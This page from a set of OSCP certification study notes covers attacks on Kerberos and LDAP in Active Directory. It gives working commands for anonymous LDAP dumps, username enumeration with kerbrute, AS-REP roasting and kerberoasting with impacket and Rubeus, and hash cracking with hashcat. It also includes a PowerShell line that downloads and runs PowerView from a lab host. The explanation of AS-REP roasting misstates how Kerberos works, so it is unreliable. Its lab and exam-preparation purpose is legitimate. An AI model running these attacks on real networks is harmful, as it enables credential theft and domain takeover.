🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Anonymous Binds
  • Kerberos Attacks
  • ASREPRoasting
  • Kerberoasting

Was this helpful?

  1. Enumeration

Kerberos

PreviousPHPMyAdminNextPOP3

Last updated 2 years ago

Was this helpful?

Kerberos is an authentication mechanism protocol used by LDAP (basically Active Directory) we can test for anonymous LDAP queries binds and enumerate users and can perform other attacks

Anonymous Binds

  • When LDAP and Kerberos ports are open, it's always a best practice to check for anonymous binds. When anonyomous binds are enabled, we can query information about the users and information about them. Sometimes the sysadmins tend to leave the user's password in their description section which will be a quick win if anonymous binds are enabled

ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=domain,DC=tld" > ldap-anonymous
ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)' > ldap-people

Machine: Cascade -

Kerberos Attacks

ASREPRoasting

Long story short,

Kerberos authentication mechanism works by encrypting the timestamp with the user's password. And sending that encrypted timestamp to the server. The server decrypts the timestamp with the user's password and sends back a request with the user's password.

The request sent by the server with the user's password is known as ASRESPonse. This ticket can be cracked offline to obtain the password of the user.

Fully Explained ( Youtube ) :

  • Try to enumerate user names as much as possible

  • With the usernames try to generate the usernames with

  • Once the valid usernames are obtained try to identify the valid usernames with 

kerbrute userenum -d domain.tld usernames.txt | tee kerb.out

# users.txt --> the username@domain.tld section from the kerb.out

  • Once the valid usernames are identified perform ASREPRoasting

impacket-GetNPUsers -usersfile users.txt domain.tld/ -outputfile getnpusers.txt

  • With the obtained hash, the password for the user can be obtained by cracking with hashcat / john

hashcat -m 18200 getnpusers.txt /usr/share/wordlists/rockyou.txt

Kerberoasting

To perform kerberoasting a valid user credentials is required / an access to the machine is required

From Linux

impacket-GetUserSPN domain.tld/username:password@$ip -dc-ip $ip -outputfile kerberoasting.hash

From Windows

# With powerview
iex(iwr -uri http://10.10.10.29/PowerView.ps1 -usebasicparsing)
Get-NetUser -SPN

# Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoasting.hash

Cracking

hashcat -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
Here
Here
username-anarchy
kerbrute